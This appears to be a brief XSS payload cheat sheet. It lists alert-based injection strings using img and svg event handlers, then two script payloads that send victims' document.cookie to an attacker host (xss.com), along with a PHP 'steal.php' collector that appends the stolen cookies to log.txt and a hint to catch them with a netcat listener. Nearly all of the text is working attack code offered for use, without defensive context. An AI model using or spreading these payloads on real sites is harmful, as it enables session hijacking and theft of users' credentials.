always try to inpuit " ' > 
<IMG SRC=# onmouseover="alert('1')">
<svg/onload=alert('2')>
<IMG SRC= onmouseover="alert('3')">
<IMG onmouseover="alert('4')">
 =================================================
|      XSS to post cookie with nc -lvnp 80        |
 =================================================
<script>document.write('<img src="http://xss.com/pleasesubscribe.gif?cookie=' + document.cookie+ '" />')</script>


 --------------------------------------------------------------
| below xss post cookie to log.txt with the help of steal.php |
 --------------------------------------------------------------
 
 ================
|       XSS      |
 ================
<IMG """><script type="text/javascript">
document.location='http://xss.com/steal.php?q='+document.cookie;
</script>

 ================
|    steal.php   |
 ================
 <?php
$fn="log.txt";
$fh=fopen($fn,'a');
$cookie=$_GET['q'];
fwrite($fh,$cookie . "\n\n");
fclose($fh);
?>
 
